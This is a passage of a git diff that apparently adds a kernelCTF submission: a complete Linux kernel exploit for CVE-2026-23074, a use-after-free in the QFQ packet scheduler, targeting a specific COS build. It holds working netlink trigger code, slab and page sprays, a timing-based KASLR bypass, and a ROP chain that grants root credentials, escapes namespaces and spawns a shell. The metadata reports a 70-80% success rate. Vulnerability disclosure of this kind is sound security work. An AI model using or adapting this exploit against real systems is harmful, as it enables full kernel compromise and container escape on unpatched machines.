limit); + nl_attr_nest_end(msg, nest); + return nl_send(sock, msg); +} + +// add teql qdisc +static void add_qdisc_teql(int sock, int ifindex, uint32_t parent, uint32_t handle) +{ + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_NEWQDISC, NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL,ifindex, parent, handle); + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "teql0"); + nl_send(sock, msg); +} + +// add netem qdisc +static void add_qdisc_netem(int sock, int ifindex, uint32_t parent, uint32_t handle) +{ + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_NEWQDISC, NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL, + ifindex, parent, handle); + nl_attr_put_str(msg, 
TC_MSG_BUFSIZE, TCA_KIND, "netem"); + + struct tc_netem_qopt qopt; + memset(&qopt, 0, sizeof(qopt)); + qopt.latency = 100000000; // set latency to 6.4s to control qfq_dequeue() re-entry timing + qopt.limit = 1000; // max packets in queue + nl_attr_put(msg, TC_MSG_BUFSIZE, TCA_OPTIONS, &qopt, sizeof(qopt)); + + nl_send(sock, msg); +} + + +// create dummy interface +static int create_dummy_interface(int sock, const char *name) +{ + struct nl_req req; + memset(&req, 0, sizeof(req)); + + req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nlh.nlmsg_type = RTM_NEWLINK; + req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL; + req.ifi.ifi_family = AF_UNSPEC; + + struct rtattr *rta = (struct rtattr *)((char *)&req + NLMSG_ALIGN(req.nlh.nlmsg_len)); + rta->rta_type = IFLA_IFNAME; + rta->rta_len = RTA_LENGTH(strlen(name) + 1); + strcpy((char*)RTA_DATA(rta), name); + req.nlh.nlmsg_len += RTA_ALIGN(rta->rta_len); + + struct rtattr *linkinfo = (struct rtattr *)((char *)&req + NLMSG_ALIGN(req.nlh.nlmsg_len)); + linkinfo->rta_type = IFLA_LINKINFO; + + struct rtattr *kind = (struct rtattr*)RTA_DATA(linkinfo); + kind->rta_type = IFLA_INFO_KIND; + kind->rta_len = RTA_LENGTH(6); + strcpy((char*)RTA_DATA(kind), "dummy"); + + linkinfo->rta_len = RTA_LENGTH(RTA_ALIGN(kind->rta_len)); + req.nlh.nlmsg_len += RTA_ALIGN(linkinfo->rta_len); + + return send(sock, &req, req.nlh.nlmsg_len, 0); +} + +// interface up +static int set_interface_up(int sock, int ifindex) +{ + struct { + struct nlmsghdr nlh; + struct ifinfomsg ifi; + } req; + + memset(&req, 0, sizeof(req)); + req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nlh.nlmsg_type = RTM_NEWLINK; + req.nlh.nlmsg_flags = NLM_F_REQUEST; + req.ifi.ifi_family = AF_UNSPEC; + req.ifi.ifi_index = ifindex; + req.ifi.ifi_flags = IFF_UP; + req.ifi.ifi_change = IFF_UP; + + return send(sock, &req, req.nlh.nlmsg_len, 0); +} + +// create dummy0 interface and set root qdisc for qfq_aggregate struct spray +static 
void setup_spray_interface(int sock) +{ + create_dummy_interface(sock, "dummy0"); + usleep(10000); + + spray_ifindex = if_nametoindex("dummy0"); + set_interface_up(sock, spray_ifindex); + add_qdisc_qfq(sock, spray_ifindex, TC_H_ROOT, SPRAY_QDISC); +} + +// spray qfq_aggregate in kmalloc-128 +// use different lmax per set to assign each to a different qfq_group +static void spray_qfq_aggregate_kmalloc_128(int sock, int set) +{ + uint32_t base = 0x10 + (set * 0x100); + + for (int i = 0; i < SPRAY_CLASS_COUNT; i++) { + add_class_qfq(sock, spray_ifindex, SPRAY_QDISC, TC_HANDLE(100, base + i), 1, 1514 + set * 0x100 + i); + } +} + +// delete QFQ class +static int del_qfq_class(int sock, int ifindex, uint32_t parent, uint32_t handle) +{ + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_DELTCLASS, NLM_F_REQUEST, ifindex, parent, handle); + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "qfq"); + return nl_send(sock, msg); +} + +static void free_spray_classes(int sock, int set) +{ + uint32_t base = 0x10 + (set * 0x100); + + for (int i = 0; i < SPRAY_CLASS_COUNT; i++) { + del_qfq_class(sock, spray_ifindex, SPRAY_QDISC, TC_HANDLE(100, base + i)); + } +} + +// add SFQ qdisc (qopt values are arbitrary, just need to pass validation) +static void add_qdisc_sfq(int sock, int ifindex, uint32_t parent, uint32_t handle) +{ + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_NEWQDISC, NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL,ifindex, parent, handle); + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "sfq"); + + struct tc_sfq_qopt_v1 qopt; + memset(&qopt, 0, sizeof(qopt)); + qopt.v0.quantum = 150994944; + qopt.v0.perturb_period = 50331648; + qopt.v0.limit = 4278190080; + qopt.v0.divisor = 4152360959; + qopt.v0.flows = 150994957; + qopt.depth = 33554432; + qopt.qth_min = 33554432; + qopt.qth_max = 83886080; + nl_attr_put(msg, TC_MSG_BUFSIZE, TCA_OPTIONS, &qopt, sizeof(qopt)); + nl_send(sock, msg); +} + +// update QFQ class parameters +static void 
update_class_qfq(int sock, int ifindex, uint32_t parent, uint32_t handle, + uint32_t weight, uint32_t lmax) +{ + struct rtattr* nest; + struct nlmsghdr* msg = nl_msg_init(); + + nl_msg_init_tc(msg, RTM_NEWTCLASS, NLM_F_REQUEST | NLM_F_CREATE | NLM_F_REPLACE, ifindex, parent, handle); + + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "qfq"); + + nest = nl_attr_nest_start(msg, TC_MSG_BUFSIZE, TCA_OPTIONS); + nl_attr_put_u32(msg, TC_MSG_BUFSIZE, TCA_QFQ_WEIGHT, weight); + nl_attr_put_u32(msg, TC_MSG_BUFSIZE, TCA_QFQ_LMAX, lmax); + nl_attr_nest_end(msg, nest); + + nl_send(sock, msg); +} + + +int pgv_create_socket(size_t block_size, size_t block_nr) { + int socketfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET); + if (socketfd < 0) { + perror("socket"); + return -1; + } + + int version = TPACKET_V1; + if (setsockopt(socketfd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0) { + perror("setsockopt PACKET_VERSION"); + close(socketfd); + return -1; + } + + struct tpacket_req req; + memset(&req, 0, sizeof(req)); + req.tp_block_size = block_size; + req.tp_block_nr = block_nr; + req.tp_frame_size = PAGE_SIZE; + req.tp_frame_nr = (block_size * block_nr) / PAGE_SIZE; + + if (setsockopt(socketfd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0) { + perror("setsockopt PACKET_TX_RING"); + close(socketfd); + return -1; + } + + return socketfd; +} + +void pgvAdd(int idx, int order, int nr) { + size_t block_size = PAGE_SIZE * (1 << order); + pgv[idx].fd = pgv_create_socket(block_size, nr); + pgv[idx].size = block_size * nr; +} + +void *pgvMap(int idx) { + pgv[idx].mapped = (char*)mmap(NULL, pgv[idx].size, PROT_READ | PROT_WRITE, MAP_SHARED, pgv[idx].fd, 0); + if (pgv[idx].mapped == MAP_FAILED) { + perror("mmap"); + return NULL; + } + return pgv[idx].mapped; +} + +void pgvDel(int idx) { + if (pgv[idx].mapped && pgv[idx].mapped != MAP_FAILED) { + munmap(pgv[idx].mapped, pgv[idx].size); + pgv[idx].mapped = NULL; + } + if (pgv[idx].fd > 0) { + close(pgv[idx].fd); + pgv[idx].fd 
= 0; + } + pgv[idx].size = 0; +} + +// initialize libxdk target DB +// manually register symbols not in kxdb via AddSymbol +void init_libxdk(void) { + static TargetDb kxdb("target_db.kxdb", target_db); + + Target st("kernelctf", "cos-113-18244.521.39"); + + st.AddSymbol("__init_begin", 0x345c000); + st.AddSymbol("bond_link_ops", 0x2d86f00); + st.AddSymbol("gadget_xor_eax_ret", GADGET_XOR_EAX_JMP); + st.AddSymbol("swapgs_restore_regs_and_return_to_usermode", 0x1401190); + + + st.AddStruct("qfq_aggregate", 104, { + {"next.next", 0x00, 8}, + {"next.pprev", 0x08, 8}, + {"grp", 0x20, 8}, + {"inv_w", 0x30, 4}, + {"budgetmax", 0x34, 4}, + {"initial_budget", 0x38, 4}, + {"budget", 0x3c, 4}, + {"active.next", 0x48, 8}, + }); + + + kxdb.AddTarget(st); + + static Target target = kxdb.AutoDetectTarget(); + g_target = &target; + + printf("[+] Target: %s %s\n", target.GetDistro().c_str(), target.GetReleaseName().c_str()); +} + +// spray fake data over freed qfq_aggregate location via pgv +void spray_pgv(void) { + // lookup field offsets + auto off_next_next = g_target->GetFieldOffset("qfq_aggregate", "next.next"); + auto off_next_pprev = g_target->GetFieldOffset("qfq_aggregate", "next.pprev"); + auto off_grp = g_target->GetFieldOffset("qfq_aggregate", "grp"); + auto off_inv_w = g_target->GetFieldOffset("qfq_aggregate", "inv_w"); + auto off_budgetmax = g_target->GetFieldOffset("qfq_aggregate", "budgetmax"); + auto off_initial_budget = g_target->GetFieldOffset("qfq_aggregate", "initial_budget"); + auto off_budget = g_target->GetFieldOffset("qfq_aggregate", "budget"); + auto off_active_next = g_target->GetFieldOffset("qfq_aggregate", "active.next"); + + pgvAdd(0, 0, 0x200); + char *res = (char*)pgvMap(0); + if (!res) return; + + size_t total_size = pgv[0].size; + + for (size_t offset = 0; offset < total_size; offset += 0x80) { + char *agg = res + offset; + // craft next/pprev so hlist_del_init() writes ROP chain address to bond_link_ops + *(uint64_t*)(agg + off_next_next) = 
init_region_base + FAKE_ROP_CHAIN_OFFS; // ROP chain location + *(uint64_t*)(agg + off_next_pprev) = bond_link_ops; // unlink writes ROP chain location to bond_link_ops + *(uint64_t*)(agg + off_grp) = init_region_base + FAKE_DUMMY_PTR_OFFS; // valid pointer needed due to grp->slot_shift access + *(uint32_t*)(agg + off_inv_w) = 0x1000; + *(uint32_t*)(agg + off_budgetmax) = 0xffffffff; + *(uint32_t*)(agg + off_initial_budget) = 0x1000; + *(uint32_t*)(agg + off_budget) = 0x2000; + *(uint64_t*)(agg + off_active_next) = init_region_base + FAKE_CL_ALIST_OFFS; // points to cl + } +} + +// NPerm spray. [__init_begin, __init_end] region is freed after boot and can be reclaimed via user mmap +void spray_nperm_payload(){ + size_t cl = init_region_base + FAKE_CL_STRUCT_OFFS; + size_t qdisc = init_region_base + FAKE_QDISC_STRUCT_OFFS; + + pgvAdd(1, 9, 0x610); // bulk allocation to drain free pages, so subsequent mmap reclaims [__init_begin, __init_end] region + + RopChain rop(*g_target, kaslr); + + // rtnl_link_ops->kind pointer and stack_pivot sit in the middle of ROP chain, skip with stack shift gadgets + rop.Add(stack_shift2_ret); + rop.Add(0); + rop.Add(init_region_base + FAKE_KIND_STRING_INDEX * sizeof(size_t)); // rtnl_link_ops->kind points to ((size_t*)addr)[FAKE_KIND_STRING_INDEX] + rop.Add(stack_shift5_ret); + rop.Add(1); + rop.Add(2); + rop.Add(0); + rop.Add(0); + rop.Add(0); + rop.Add(stack_shift5_ret); + rop.Add(1); + rop.Add(2); + rop.Add(0); + rop.Add(0); + rop.Add(0); + rop.Add(stack_shift2_ret); + rop.Add(0); + rop.Add(stack_pivot); // stack_pivot gadget + + // privilege escalation + namespace escape + rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS); + rop.AddRopAction(RopActionId::SWITCH_TASK_NAMESPACES, {1}); + + // Return to userspace + rop.Add(swapgs_restore_regs_and_return_to_usermode + 54); + rop.Add(0); + rop.Add(0); + rop.Add((uint64_t)get_shell); + rop.Add(user_cs); + rop.Add(user_rflags); + rop.Add(user_rsp & 0xffffffffffffff00); + 
rop.Add(user_ss); + + std::vector<uint8_t> rop_data = rop.GetData(); + // mmap 0x10000 (65536) pages to attempt reclaiming [__init_begin, __init_end] region + for(int i = 0; i < 0x1000 * 0x10; i++){ + void *addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if(addr == MAP_FAILED) break; + // no suitable pivot for ops->peek() call in qfq_peek_skb(), use xor eax, eax to return NULL and bypass + ((size_t*)addr)[FAKE_CL_PTR] = cl; + ((size_t*)addr)[FAKE_QDISC_PTR] = qdisc; + ((size_t*)addr)[FAKE_OPS_PEEK_PTR] = xor_eax_jmp; + ((size_t*)addr)[FAKE_KIND_STRING_INDEX] = FAKE_KIND_STRING_IPVLAN; + // place ROP chain + memcpy(&((size_t*)addr)[0x108], rop_data.data(), rop_data.size()); + } + + pgvDel(1); +} + +/* + * LL_ATK: send RTM_NEWLINK request with "ipvlan" type. + * kernel traverses rtnl_link_ops list, follows corrupted bond_link_ops->list.next + * to fake ops with kind "ipvlan", calls function pointer -> triggers ROP + */ +void LL_ATK() { + struct { + struct nlmsghdr nh; + struct ifinfomsg ifi; + char buf[1024]; + } req; + + struct rtattr *rta; + int sock; + + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock < 0) { + perror("socket"); + exit(EXIT_FAILURE); + } + + memset(&req, 0, sizeof(req)); + + req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(req.ifi)); + req.nh.nlmsg_type = RTM_NEWLINK; + req.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL; + + req.ifi.ifi_family = AF_UNSPEC; + + rta = (struct rtattr *)(((char *)&req) + NLMSG_ALIGN(req.nh.nlmsg_len)); + rta->rta_type = IFLA_LINKINFO; + rta->rta_len = RTA_LENGTH(0); + + struct rtattr *rta_data = (struct rtattr *)(((char *)rta) + RTA_ALIGN(rta->rta_len)); + rta_data->rta_type = IFLA_INFO_KIND; + rta_data->rta_len = RTA_LENGTH(strlen("ipvlan") + 1); + strcpy((char *)RTA_DATA(rta_data), "ipvlan"); + + rta->rta_len = RTA_ALIGN(rta->rta_len) + RTA_ALIGN(rta_data->rta_len); + + req.nh.nlmsg_len = NLMSG_ALIGN(req.nh.nlmsg_len) + RTA_ALIGN(rta->rta_len); + + write(sock,&req, 
req.nh.nlmsg_len); +} + +/* + * setup TC structure + * + * ROOT qdisc 1:0 (QFQ) + * ├── class 1:1 (weight=15, lmax=16384) -> netem + * └── class 1:2 (weight=1, lmax=1514) -> teql + */ +static long vuln_setup(void) +{ + int sock; + int ifindex = 1; + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + + cleanup_tc(sock, ifindex); + setup_spray_interface(sock); + + add_qdisc_qfq(sock, ifindex, TC_H_ROOT, TC_HANDLE(1, 0)); + + add_class_qfq(sock, ifindex, TC_HANDLE(1, 0), TC_HANDLE(1, 1), 15, 16384); + add_class_qfq(sock, ifindex, TC_HANDLE(1, 0), TC_HANDLE(1, 2), 1, 2000); + + add_qdisc_sfq(sock, ifindex, TC_HANDLE(1, 1), TC_HANDLE(2, 0)); + send_to_class(TC_HANDLE(1, 2), 1); + // spray qfq_aggregate around the target to land in the same slab as the UAF target + spray_qfq_aggregate_kmalloc_128(sock, 0); + spray_qfq_aggregate_kmalloc_128(sock, 1); + add_class_qfq(sock, ifindex, TC_HANDLE(1, 0), TC_HANDLE(1, 2), 1, 1514); + update_class_qfq(sock, ifindex, TC_HANDLE(1, 0), TC_HANDLE(1, 2), 1, 1514); + spray_qfq_aggregate_kmalloc_128(sock, 2); + + add_qdisc_netem(sock, ifindex, TC_HANDLE(1, 1), TC_HANDLE(2, 0)); + add_qdisc_teql(sock, ifindex, TC_HANDLE(1, 2), TC_HANDLE(3, 0)); + + send_to_class(TC_HANDLE(1, 1), 1); + send_to_class(TC_HANDLE(1, 2), 1); + + close(sock); + return 0; +} + +static long vuln_setup2(void) +{ + int sock; + int ifindex = 1; + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + + // free sprayed qfq_aggregate + free_spray_classes(sock, 0); + free_spray_classes(sock, 1); + free_spray_classes(sock, 2); + update_class_qfq(sock, ifindex, TC_HANDLE(1, 0), TC_HANDLE(1, 2), 1, 32222); // changing lmax frees existing qfq_aggregate, leaving dangling pointer + close(sock); + return 0; +} + +int main(void) +{ + leak_kaslr(); + init_libxdk(); + setup_kernel_address(); + setup_env(); + pid_t pid = fork(); + + if (pid == 0) { + spray_nperm_payload(); + _exit(0); + } + else if (pid > 0) { + int status; + waitpid(pid, &status, 0); + + vuln_setup(); + 
vuln_setup2(); + spray_pgv(); + // @sleep(kernel_func="qfq_dequeue", desc="wait for netem delay to trigger UAF") + sleep(10); + LL_ATK(); + } + return 0; +} diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.o b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.o new file mode 100644 index 000000000..a7bd52e47 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.o differ diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.c b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.c new file mode 100644 index 000000000..c7430d9d5 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.c @@ -0,0 +1,215 @@ +#include <stdio.h> +#include <stdint.h> +#include "kaslr_bypass.h" + +#define KASLR_BYPASS_INTEL 1 +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) +#define logd(fmt, ...) dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__) + +uint64_t kaslr = -1; + +// KASLR bypass +// +// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h +// +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile ("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +void prefetch(void* p) +{ + asm volatile ( + "prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : : "r" (p)); +} + +size_t flushandreload(void* addr) // row miss +{ + size_t time = 
rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +int bypass_kaslr(uint64_t base) { + if (!base) { + #ifdef KASLR_BYPASS_INTEL + #define OFFSET 0 + #define START (0xffffffff81000000ull + OFFSET) + #define END (0xffffffffD0000000ull + OFFSET) + #define STEP 0x0000000001000000ull + while (1) { + uint64_t bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + base -= OFFSET; + goto got_base; + } + + logd("majority vote failed:\n"); + logd("base = 0x%lx with %d votes\n", base, c); + } + #else + #define START (0xffffffff81000000ull) + #define END (0xffffffffc0000000ull) + #define STEP 0x0000000000200000ull + #define NUM_TRIALS 7 + // largest contiguous mapped area at the beginning of _stext + #define WINDOW_SIZE 11 + + while (1) { + uint64_t bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = 
START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) { + sum += times[ti + i]; + } + if (sum > max) { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + goto got_base; + } + + logd("majority vote failed:\n"); + logd("base = 0x%lx with %d votes\n", base, c); + } + #endif + } + +got_base: + logd("Using kernel base 0x%lx", base); + kaslr = base; + + return 0; +} + +void leak_kaslr(void) +{ + bypass_kaslr(0); + printf("[+] kernel base: 0x%lx\n", kaslr); +} diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.h b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.h new file mode 100644 index 000000000..7652ea5ab --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.h @@ -0,0 +1,19 @@ +#ifndef KASLR_BYPASS_H +#define KASLR_BYPASS_H + +#include <stdint.h> + +#ifdef __cplusplus +extern "C" { +#endif + +extern uint64_t kaslr; + +int bypass_kaslr(uint64_t base); +void leak_kaslr(void); + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.o b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.o new file mode 100644 index 000000000..65248fc43 Binary files /dev/null and 
b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.o differ diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/metadata.json b/pocs/linux/kernelctf/CVE-2026-23074_cos/metadata.json new file mode 100644 index 000000000..f525ec8ed --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/metadata.json @@ -0,0 +1,25 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp440"], + "vulnerability": { + "cve": "CVE-2026-23074", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50da4b9d07a7a463e2cfb738f3ad4cff6b2c9c3b", + "affected_versions": ["2.6.12-rc2 - 6.19-rc6"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NET_SCHED", + "CONFIG_NET_SCH_TEQL" + ] + } + }, + "exploits":{ + "cos-113-18244.521.39": { + "environment": "cos-113-18244.521.39", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "7 ~ 8 times success per 10 times run" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23074_cos/original.tar.gz new file mode 100755 index 000000000..f8cfd1e14 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23074_cos/original.tar.gz differ